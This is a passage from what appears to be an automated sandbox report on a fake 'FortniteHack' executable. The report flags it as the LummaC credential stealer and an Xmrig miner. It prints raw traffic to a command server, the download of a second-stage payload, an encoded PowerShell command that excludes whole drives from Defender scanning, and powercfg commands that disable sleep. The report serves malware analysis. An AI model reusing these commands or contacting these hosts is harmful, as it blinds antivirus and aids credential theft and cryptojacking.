4f 22 de 49 b0 c6 85 c1 c8 42 51 13 eb 52 f6 e5 22 df 33 db 95 7e 7f e2 92 c0 3d dc 9d 75 4b Data Ascii: +wZSzZ54>=vnX_Y68`]R~f{eK29E%h!9-ixFe~h57r*KY`X}W<QnvB=xIOh?JuyMZXuwGYd@A$4x.?.RrTe<dO"IBQR"3~=uK
2025-03-13 12:35:29 UTC	15331	OUT	Data Raw: 12 35 ea 82 aa 69 8d 64 9c e9 27 fe 72 c6 ef 3b 26 a1 65 6c 97 ef 4c 3e 7a f4 8a a6 ff 2e 51 4f 52 8d bd 24 ea a7 0d e0 8a 13 44 24 fa c2 9a fd 80 7a bd 8a 70 ac 7d b9 21 1f 4f cb 0d 68 ee a8 96 32 17 6b 5d 8b 53 c0 21 ee 5d fd f0 6d 77 e8 a0 f9 01 f0 a1 3c 07 26 da d0 c4 1b 9d fb 2a e7 16 3f 09 14 00 c6 21 33 38 3c 97 61 dd 64 4c d7 3a cb cb 5b 04 a7 28 72 4d 8d 9c 57 3f 25 d5 6e 44 02 a5 a1 d2 a0 d9 1f 32 2b a1 3b 7a 11 60 19 db 7f f8 34 99 10 65 34 5e 82 e8 45 ec 93 3a 25 8b 65 a6 66 b3 65 d2 60 d3 bf cb ec f8 23 ab 3c 85 63 ca 96 cb c7 51 2e a3 f1 9c bd cd d4 8b 30 d6 a3 25 6c de e8 4b 42 a3 e7 62 75 86 fe 69 88 a3 ef 0a c4 65 24 50 3a b6 4c 27 32 17 65 e7 52 ed ca 34 be ec 94 ae cc 11 96 12 40 45 c4 ea 23 74 b0 3c bc ee 25 1b 43 af 29 79 ec 71 03 3b Data Ascii: 5id'r;&elL>z.QOR$D$zp}!Oh2k]S!]mw<&*?!38<adL:[(rMW?%nD2+;z`4e4^E:%efe`#<cQ.0%lKBbuie$P:L'2eR4@E#t<%C)yq;
2025-03-13 12:35:33 UTC	818	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:35:32 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=p%2BoVlmdfU2PrtpYpMeoh%2FOctAk3sRlvHB84ln10Dv15DYtCo7xaMZmaxQb4M1XZe9fjHz0yI8QfTWyzDc%2BRoT1FYk3oeKnAKb%2FluyD4BbMC%2FpKgzwPC0a3iIkK7ZprwV"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb9250bea7e825-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=14030&min_rtt=13965&rtt_var=4048&sent=242&recv=427&lost=0&retrans=0&sent_bytes=2832&recv_bytes=553468&delivery_rate=201882&cwnd=247&unsent_bytes=0&cid=0d37cd3960e98346&ts=2983&x=0"

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
6	192.168.2.12	49702	188.114.96.3	443	6908	C:\Users\user\Desktop\FortniteHack.exe1.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:35:34 UTC	263	OUT	POST /gdJIS HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36 Content-Length: 95 Host: citydisco.bet
2025-03-13 12:35:34 UTC	95	OUT	Data Raw: 75 69 64 3d 30 65 61 32 39 33 37 62 36 33 35 37 37 36 37 66 31 38 65 39 39 30 37 34 33 63 38 63 36 30 66 65 38 37 36 35 62 39 39 33 32 64 39 33 65 36 38 66 26 63 69 64 3d 26 68 77 69 64 3d 43 41 46 42 46 32 38 30 38 45 35 41 46 44 44 32 34 30 32 36 39 30 44 32 32 31 43 39 34 32 45 39 Data Ascii: uid=0ea2937b6357767f18e990743c8c60fe8765b9932d93e68f&cid=&hwid=CAFBF2808E5AFDD2402690D221C942E9
2025-03-13 12:35:35 UTC	776	IN	HTTP/1.1 200 OK Date: Thu, 13 Mar 2025 12:35:34 GMT Content-Type: application/octet-stream Content-Length: 10735 Connection: close cf-cache-status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=tpXC1bpOccMXHJEbl37S1R5TvOuECXrGWD5LcGDQwdRbdmS6SwvjbmoT%2FY2UpMFCzWVh2sexS%2B1qVeHixg5pBwXbObjiEJRMtJw7kqcvOV8WpZEX4FZkNg5W85LkFKZF"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 91fb926d5d5c870a-ORD alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=13220&min_rtt=13029&rtt_var=3878&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2832&recv_bytes=994&delivery_rate=210602&cwnd=225&unsent_bytes=0&cid=25c284ba7200030d&ts=899&x=0"
2025-03-13 12:35:35 UTC	593	IN	Data Raw: 3a 4f 16 d2 fc b0 3a 26 14 14 61 69 6c 3c 21 36 31 2b b3 62 2c dd b4 34 ba 39 91 77 10 f6 ec ee d3 fc 5a f5 96 6b aa dc e4 8f ab 92 34 11 ca c1 b1 d2 dd 0a a4 96 00 98 d3 26 ca 35 0c f0 64 58 15 75 e2 9a 2c 24 aa af 27 2d 74 86 a0 83 91 a5 7d eb 55 d0 50 d7 ca 34 3a e0 f2 0d 40 2f 04 83 11 cd ae 00 bb aa f2 55 cd 2c ea 88 97 1d cf ed 10 80 92 a1 dd ad 31 76 a1 94 eb 2e e3 c0 45 c8 92 bc c6 3c b3 b4 8e 0f 6f db b8 44 01 26 48 9e 15 7d 3b 72 71 a1 60 72 64 0b dd b4 bd a1 b1 29 21 52 ad 6a 71 1c 9f df 61 2a 07 4c d0 a0 f9 2d 7d 4f a5 1f ff 8e 1e af 23 70 19 47 93 ca 2d 40 7d c9 38 c0 0b 55 a6 3e 52 cd 70 0c f4 2f e7 c2 34 05 37 0e d0 31 eb ac 29 0a 41 33 2a 22 28 49 75 a8 de 93 c5 8e 6c c1 06 b3 2b 66 26 80 a3 f8 1c 93 2f c2 06 b6 67 af cd 99 96 ef b4 32 81 Data Ascii: :O:&ail<!61+b,49wZk4&5dXu,$'-t}UP4:@/U,1v.E<oD&H};rq`rd)!RjqaL-}O#pG-@}8U>Rp/471)A3"(Iul+f&/g2
2025-03-13 12:35:35 UTC	1369	IN	Data Raw: 25 a2 da a5 5c c3 37 65 9f 57 52 31 63 a4 04 d8 ba ed 6f 0f d3 2b 12 61 64 15 28 56 78 8b ad 7f 64 c3 da 96 5b f9 2b 8a 7f 4d 69 0b c2 0e 96 e7 80 12 80 a0 ae d6 4a 75 a9 51 38 40 1e 29 61 cf e7 34 d2 eb ae 60 7f 90 89 d3 aa c3 de 34 be 3b 0d af ce c2 3e 27 37 c2 b1 28 ec da 1b 7d 2c 9b 9d 06 60 61 1f 18 21 6b 41 0c a1 70 b2 19 3c 5b e4 59 75 23 c0 fd d8 b7 d3 e6 1a ff 4d aa 3e 06 26 a2 93 b5 1f b2 07 43 c6 19 5c e1 a5 84 db f0 17 0c 39 43 e0 11 b1 79 b1 40 b7 d3 49 bc 21 fc 2c b9 8d 87 b9 47 c2 1a ca 22 fa 0d 3a 24 b5 26 f1 65 b6 da 1b 1b f4 99 a7 0c f3 08 b1 30 6d d7 a6 3f f2 4c a4 d0 d4 cb 35 ab 2d d3 16 0b 0d e1 72 2f d9 5e 0e d7 40 2a 9d d1 aa 09 2a 7b 08 53 9e 1d 1d a9 80 31 81 87 82 c4 83 29 76 c6 c7 e9 12 1c 2a ef 24 47 41 54 e2 d0 7f b6 18 1e 42 Data Ascii: %\7eWR1co+ad(Vxd[+MiJuQ8@)a4`4;>'7(},`a!kAp<[Yu#M>&C\9Cy@I!,G":$&e0m?L5-r/^@*{S1)v$GATB
2025-03-13 12:35:35 UTC	1369	IN	Data Raw: 7d c6 11 ca 04 cd 95 24 67 20 1f 8d 97 8a 09 c9 72 a4 ff 66 27 fb 80 a8 fc e6 e4 41 02 9f 38 dc 3e f6 94 30 f1 7e 92 0d 49 56 28 8b cb 07 4c cd b2 21 87 a9 fc d5 eb fb b3 6a ec 98 26 53 df 10 11 58 ad 9f c9 7b 9d d2 98 d5 2c 61 3a 3e b7 b1 c7 14 87 55 b5 38 80 58 76 fb 71 9d 43 8c 71 eb 74 2d b2 1f 31 77 7b 47 52 c8 4f da 89 50 74 da 18 5f 51 d2 24 18 1e 25 56 ed 37 07 3a 09 59 5e 3c b8 fe 7d 29 a3 c8 86 52 50 64 89 b8 bf 3e 1f 4d 04 92 2a 5a 94 4a 38 a8 06 9d e5 e3 bb 28 fb ab 56 b7 7f 9e c5 64 6f 58 f6 2f bc ac e6 84 36 2c 4a be 70 4c ee 22 ec eb f8 1a e1 1e 83 3b 48 9d 8c 2c 3b d1 92 01 eb 0d eb 07 29 db 27 6a 20 47 78 87 c9 4a 94 3c cb ad e5 33 d6 1f aa 86 23 ef d6 9a f6 76 e4 78 87 e3 a1 e0 3b 44 ef a3 a1 9c 6c 47 e0 6a a0 2b fd 93 b4 92 15 7e 29 bb Data Ascii: }$g rf'A8>0~IV(L!j&SX{,a:>U8XvqCqt-1w{GROPt_Q$%V7:Y^<})RPd>M*ZJ8(VdoX/6,JpL";H,;)'j GxJ<3#vx;DlGj+~)
2025-03-13 12:35:35 UTC	1369	IN	Data Raw: 3b 05 3e 4a 8e a4 bd eb 7d 7f f3 13 40 cc e7 44 c9 8c e6 64 2f 40 b9 a2 52 1c a7 26 05 e5 12 3a a1 f8 0c f4 90 4f a5 90 d3 27 70 c9 96 11 3d 5b 1c b8 5c bf 49 e4 20 8f 49 aa 53 dd 83 86 78 20 36 8d 7e 3a 85 28 a8 d6 df d6 ec 19 1f b5 39 87 9f c0 23 ff 0f 43 2e eb 6a 8b 49 e0 77 e3 43 bc d5 ca 0d 93 18 95 7a 78 c2 a0 af 28 c5 34 c2 0f d2 69 c9 7a 94 ec 06 d0 07 c4 fa 50 8e 0d 04 5a 45 f8 fc 1a 62 54 15 61 68 3e d7 f3 15 2f 6a 5d 07 08 9e ab f8 75 0d 04 d9 91 b0 0f 84 83 2e 53 0f 76 a9 0f 45 ba 6e a4 65 3e 2a f5 02 9f d1 c9 45 3c a2 9b 6a 3e bd da a6 24 ce c0 ab b8 3c b5 0f 50 68 7f 96 66 0d fd 65 f4 93 f4 f1 b2 90 8f 45 16 ea b6 f2 4c 19 21 37 8a b1 c4 6b 5a 3f 4a 66 59 13 05 61 2a 41 f4 16 44 52 28 b1 f4 e2 20 3a 72 12 ef 49 53 60 26 67 e5 a7 74 1a 45 8b Data Ascii: ;>J}@Dd/@R&:O'p=[\I ISx 6~:(9#C.jIwCzx(4izPZEbTah>/j]u.SvEne>E<j>$<PhfeEL!7kZ?JfYaADR( :rIS`&gtE
2025-03-13 12:35:35 UTC	1369	IN	Data Raw: 50 7f fa 68 24 0c 45 e0 b9 d6 ff 50 04 46 a3 ef c3 27 6d 44 be f4 24 27 24 49 c7 e1 36 af ad 05 fe 5a f3 3f e7 c4 c2 b4 89 ea 62 de a6 14 85 eb 91 8b 1d 4c 75 40 23 04 71 62 d3 a9 70 1c b3 9f b4 3c bc 53 53 f4 0f 2d 61 b3 23 cb 8f 1c be 5b c2 76 7f f5 b8 30 6b dc 70 b3 0e 78 65 1d 01 b9 cf 35 11 53 dd 76 75 34 ec 9b 54 6d b3 1f cf 21 67 a2 6c 9e 40 63 fc 5e a7 6e 8e 2d 53 6b 12 0a a1 16 51 88 f1 36 ec 89 79 03 fc 13 b5 07 96 90 7b 0b f3 d8 f9 1b ac dc 11 0f ea 23 9f 69 ac f3 a3 ad 4d eb f0 78 92 c1 58 f2 50 91 f2 a2 ef e7 c6 08 c7 cb f2 19 c9 0e 8d e1 d0 b5 43 07 e1 a6 70 24 7f b5 f2 e9 10 2a ef 36 84 17 b6 49 76 58 11 ee c5 8b 45 ef 75 33 ff e3 32 89 14 09 46 ef 03 e4 5d de 8a e9 e3 79 1e 68 35 00 e2 bd c6 8b 0a 45 7a bd d1 60 24 d8 ac a0 97 3d 8d 04 d0 Data Ascii: Ph$EPF'mD$'$I6Z?bLu@#qbp<SS-a#[v0kpxe5Svu4Tm!gl@c^n-SkQ6y{#iMxXPCp$*6IvXEu32F]yh5Ez`$=
2025-03-13 12:35:35 UTC	1369	IN	Data Raw: 82 4d 74 35 90 6f d6 9c 4f d0 bd 68 34 6f d7 ea 42 47 b0 8d 04 d3 bc cd d8 8e 87 2d ba 39 63 d2 a3 dc 58 67 31 4f e4 8d 26 3c 5c 49 5f c5 74 2a 63 7a ed 4b fc f9 39 8c 11 49 0f 20 13 9f 83 3d e9 60 2f 92 dc 63 12 14 3b 1b 61 78 c0 89 d3 33 29 6c 1e ec df 58 ca e4 dd 25 c7 78 71 3f ac 45 5d d7 81 54 29 1f 4c 73 eb 22 e8 bc 34 2c ed 7a 55 3e 45 d5 10 fc 91 e2 af af bb a4 49 d8 65 69 64 07 29 8c cd df 34 d6 62 e5 eb 7f cd 90 0a 8b fe 10 2f cb 02 ae f3 60 45 ff 57 62 be 72 c0 09 3e f3 a1 59 b4 79 27 a0 43 a4 d6 18 26 50 ca bf dc b3 d1 9d 50 02 9c 26 14 40 35 9c 49 be 1f 2e 0e bb 49 c6 84 b1 85 67 d5 83 2c 2c 67 5a 6e 72 f6 dd a7 3e ae 59 be 0b 14 b1 50 c3 0c 71 78 ea b5 91 ef 9b 07 7b 6d 0d ea 1a f3 c2 19 43 6d 02 ba 4c bc 76 0e cc a2 38 c3 f1 1f 7c 95 05 f2 Data Ascii: Mt5oOh4oBG-9cXg1O&<\I_t*czK9I =`/c;ax3)lX%xq?E]T)Ls"4,zU>EIeid)4b/`EWbr>Yy'C&PP&@5I.Ig,,gZnr>YPqx{mCmLv8\|
2025-03-13 12:35:35 UTC	1369	IN	Data Raw: 75 b9 aa 18 62 91 ec 7f 8b d9 10 e7 b5 a1 2f ed e8 0f 0d be a1 ba 2d b9 e9 47 98 c7 a6 3a 46 1b a3 35 a8 4b af a0 9d 9f 2b da 78 59 4e 81 20 90 ad 65 20 df 7a 77 b4 6a cf da 87 53 f9 cf e6 10 29 97 f5 6a 43 27 aa ab 9c 89 08 77 12 b5 dd 20 f1 8d 8e 96 43 9a 3b d0 23 7e 0f 69 fd fe 41 03 62 9e d5 4d df 93 3a 5b 37 26 f8 2a 5e 46 e1 55 8d 6a 49 72 7c 90 54 ff 9f f5 83 52 38 84 3a 29 2d 8b e6 9f 73 ae eb 30 c3 d1 ba d4 83 8a b3 75 d9 19 e3 b0 95 18 5e 09 e9 78 f4 5d b5 32 3b e9 ff 4d 38 59 3b 0b 5e 55 cc f7 02 09 76 65 7e e7 21 07 c1 38 fc 92 34 c6 7c 30 b1 25 52 d0 58 48 5e 24 39 ef e1 3f 43 3e 76 8a dd 35 12 c3 30 d4 34 89 4f e0 3c d9 b9 a8 79 04 d8 e4 01 4b 82 f6 91 d3 ba 51 ba 4c 8f 03 63 24 c0 a9 b1 26 03 80 0f 16 04 8b ba 54 52 3e 35 73 67 b1 dd c4 a7 Data Ascii: ub/-G:F5K+xYN e zwjS)jC'w C;#~iAbM:[7&*^FUjIr\|TR8:)-s0u^x]2;M8Y;^Uve~!84\|0%RXH^$9?C>v504O<yKQLc$&TR>5sg
2025-03-13 12:35:35 UTC	1369	IN	Data Raw: 28 46 1e ff 63 b5 dc 2e 82 e1 db ab 94 65 87 8c e0 2d 6e 6e 93 0a 24 23 a9 ad e7 15 17 4e ef 1b f0 76 4a c6 68 df 17 43 79 59 f7 f2 f9 dc 3f ba 03 c5 a2 a6 c9 ff 37 5e ed 76 2b 32 c9 a3 59 7e 75 4c 6f f0 1b 82 e3 7b 29 d8 14 90 68 d7 71 31 cc aa b3 0c 71 b5 e5 1c ec b6 fe 53 29 30 19 78 d7 ae 5c be 70 54 87 5e a6 b9 17 c0 8d 37 3e 67 54 49 3c 90 eb 39 03 d3 20 43 b2 e3 d3 65 da 34 ff 99 6e c4 f2 a4 67 bf 68 6d 5c d0 d8 e2 9b 35 83 d0 44 de 62 7a 81 ca e5 83 a9 a7 79 7a 9a a8 d6 46 57 97 f8 47 d1 81 96 52 11 fc 2a 47 16 eb 2c 90 37 57 64 05 0d b4 dc d0 72 fa 51 15 0d a8 fd df c3 9b de 7a 5a ec 9f f4 50 23 99 5f 58 0e 1e 2b 96 b0 19 db 06 07 af 65 6f 3b cd 7b 42 3d 76 54 90 66 48 c9 36 1e ae b8 6e 4b 18 7e 86 5f 17 6c 4c ef 0e 07 bb 5d 10 ab 8b 66 43 11 d3 Data Ascii: (Fc.e-nn$#NvJhCyY?7^v+2Y~uLo{)hq1qS)0x\pT^7>gTI<9 Ce4nghm\5DbzyzFWGR*G,7WdrQzZP#_X+eo;{B=vTfH6nK~_lL]fC
2025-03-13 12:35:35 UTC	559	IN	Data Raw: 35 ac 5c e1 2b 0d 29 69 5d 89 e3 b2 86 28 35 a7 da d4 b3 28 56 1b 7e 93 d1 76 86 3c 62 c5 39 68 df e4 be 47 25 91 ae b6 5c 84 4e e6 7c 19 ba bf 95 2e 88 c9 66 d7 ca 2b 90 5c f5 1f 2f 33 c5 29 fb 2b fa 43 29 ff d4 2d 83 7f f7 9c 3f 9c d4 a3 fc 28 bd 1a 27 af 8f 24 20 ba 29 0e 65 77 67 2b ad 69 97 06 43 13 59 45 f4 19 15 04 4a af a6 47 44 f2 38 65 d5 c4 ef ee a2 10 9b 0b 5a 3e ae 44 ed 7e 87 e6 c2 af ec 9a 3c 09 95 c7 ad 70 3a de cb a7 ed ef eb c0 a1 8e ac 00 f5 ec 10 cc 2c 77 a3 fb d6 ba e8 8e 8e 00 f9 ed b6 35 2b 1e af 05 d5 ab 78 22 43 0f 47 ad 6d eb 86 b6 8f 6f 47 72 5d d2 f9 c6 53 e3 dc e9 5d b8 cd 19 2f 7b 86 8a cb eb 45 a0 f7 48 1d 57 d3 6c c2 db 4b ba cc 3e 0f 15 00 ed de 3a ce d1 20 8c 0d fd b7 95 ec de 98 0e 30 d1 5c fd 7c 65 49 ff f6 8c ba f3 ad Data Ascii: 5\+)i](5(V~v<b9hG%\N\|.f+\/3)+C)-?('$ )ewg+iCYEJGD8eZ>D~<p:,w5+x"CGmoGr]S]/{EHWlK>: 0\\|eI

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.12	49704	172.67.19.24	443	7572	C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe

Timestamp	Bytes transferred	Direction	Data
2025-03-13 12:35:40 UTC	74	OUT	GET /raw/YpJeSRBC HTTP/1.1 Host: pastebin.com Connection: Keep-Alive
2025-03-13 12:35:40 UTC	444	IN	HTTP/1.1 404 Not Found Date: Thu, 13 Mar 2025 12:35:40 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: close x-frame-options: DENY x-frame-options: DENY x-content-type-options: nosniff x-content-type-options: nosniff x-xss-protection: 1;mode=block x-xss-protection: 1;mode=block cache-control: public, max-age=1801 CF-Cache-Status: HIT Age: 99 Server: cloudflare CF-RAY: 91fb9292be86f60c-ORD
2025-03-13 12:35:40 UTC	697	IN	Data Raw: 32 62 32 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 30 2e 37 35 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 79 65 73 22 20 2f 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 20 2f 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 73 74 65 62 69 6e 2e Data Ascii: 2b2<!DOCTYPE html><html lang="en"><head> <meta name="viewport" content="width=device-width, initial-scale=0.75, maximum-scale=1.0, user-scalable=yes" /> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>Pastebin.
2025-03-13 12:35:40 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Target ID:	0
Start time:	08:35:11
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\FortniteHack.exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FortniteHack.exe1.exe"
Imagebase:	0xe90000
File size:	1'365'504 bytes
MD5 hash:	28BA19E1DCAEB26263BECC4EE53FFE66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000000.00000002.1275489089.000000000278D000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	08:35:11
Start date:	13/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6afb20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	08:35:11
Start date:	13/03/2025
Path:	C:\Users\user\Desktop\FortniteHack.exe1.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\FortniteHack.exe1.exe"
Imagebase:	0xe90000
File size:	1'365'504 bytes
MD5 hash:	28BA19E1DCAEB26263BECC4EE53FFE66
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000003.1335422075.0000000000BEC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_LummaCStealer_4, Description: Yara detected LummaC Stealer, Source: 00000002.00000002.2433287684.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	6
Start time:	08:35:12
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\WerFault.exe
Wow64 process (32bit):	true
Commandline:	C:\Windows\SysWOW64\WerFault.exe -u -p 6684 -s 392
Imagebase:	0xb40000
File size:	483'680 bytes
MD5 hash:	C31336C1EFC2CCB44B4326EA793040F2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	08:35:35
Start date:	13/03/2025
Path:	C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\6Y9CVTAOHZQ67PGGTWC454FW0.exe"
Imagebase:	0xed0000
File size:	21'504 bytes
MD5 hash:	C11A82D699A06D9B8BA4296E0C562AE4
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 0000000F.00000002.1489743142.000000000347E000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 82%, ReversingLabs
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	16
Start time:	08:35:35
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"cmd.exe" /C powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA==" & powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0 & powercfg /hibernate off
Imagebase:	0xff0000
File size:	236'544 bytes
MD5 hash:	D0FCE3AFA6AA1D58CE9FA336CC2B675B
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	17
Start time:	08:35:35
Start date:	13/03/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6afb20000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	18
Start time:	08:35:35
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	powershell -EncodedCommand "PAAjAFUAagBvAGkATwBEAFQAbgAjAD4AIABBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAEEAZQBzACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAGQAOQA2AGYAYwBEAHYAYwBjADUAIwA+ACAALQBGAG8AcgBjAGUAIAA8ACMAWQBKAE8AUwA4AHgAIwA+AA=="
Imagebase:	0x940000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	19
Start time:	08:35:37
Start date:	13/03/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff68cdb0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	false

Show Windows behavior

Target ID:	20
Start time:	08:35:38
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):	true
Commandline:	powercfg /x -hibernate-timeout-ac 0
Imagebase:	0xbd0000
File size:	78'336 bytes
MD5 hash:	9D71DBDD3AD017EC69554ACF9CAADD05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	21
Start time:	08:35:38
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):	true
Commandline:	powercfg /x -hibernate-timeout-dc 0
Imagebase:	0xbd0000
File size:	78'336 bytes
MD5 hash:	9D71DBDD3AD017EC69554ACF9CAADD05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	moderate
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	08:35:39
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):	true
Commandline:	powercfg /x -standby-timeout-ac 0
Imagebase:	0xbd0000
File size:	78'336 bytes
MD5 hash:	9D71DBDD3AD017EC69554ACF9CAADD05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	08:35:39
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):	true
Commandline:	powercfg /x -standby-timeout-dc 0
Imagebase:	0xbd0000
File size:	78'336 bytes
MD5 hash:	9D71DBDD3AD017EC69554ACF9CAADD05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	08:35:39
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\powercfg.exe
Wow64 process (32bit):	true
Commandline:	powercfg /hibernate off
Imagebase:	0xbd0000
File size:	78'336 bytes
MD5 hash:	9D71DBDD3AD017EC69554ACF9CAADD05
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	08:35:39
Start date:	13/03/2025
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
